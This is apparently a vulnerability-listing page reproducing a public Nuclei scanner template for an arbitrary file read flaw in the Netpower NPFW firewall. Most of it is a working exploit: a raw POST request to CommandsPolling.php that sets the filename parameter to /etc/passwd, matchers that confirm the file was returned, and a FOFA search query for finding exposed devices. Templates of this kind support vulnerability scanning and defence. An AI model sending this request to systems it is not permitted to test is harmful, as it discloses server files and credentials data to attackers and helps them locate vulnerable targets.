netpower-npfw-lfi: Netpower NPFW - Local File Inclusion

日期: 2025-08-01 | 影响软件: Netpower NPFW | POC: 已公开

漏洞描述

Netpower NPFW firewall has an arbitrary file read vulnerability. Due to insufficient code filtering, it can read any file on the server

PoC代码[已公开]

id: netpower-npfw-lfi

info:
  name: Netpower NPFW - Local File Inclusion
  author: ritikchaddha
  severity: high
  description: |
    Netpower NPFW firewall has an arbitrary file read vulnerability. Due to insufficient code filtering, it can read any file on the server
  reference: |
    - https://forum.butian.net/article/241
  metadata:
    max-request: 1
    fofa-query: '"Netpower" && "/direct"'
  tags: netpower,npfw,lfi

http:
  - raw:
      - |
        POST /direct/polling/CommandsPolling.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        command=ping&filename=%2Fetc%2Fpasswd&cmdParam=

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: word
        part: body
        words:
          - '{"type":"event"'
          - 'dealing'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a004730450220710116f54891721e502e08674c065f0db1a8276ba347b130cea41262498fbefe022100fc9af9495b327390b3cce26aa7d5b9d4c13211c5f07905f1bcf52a4c61e50d55:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/./http/vulnerabilities/other/netpower-npfw-lfi.yaml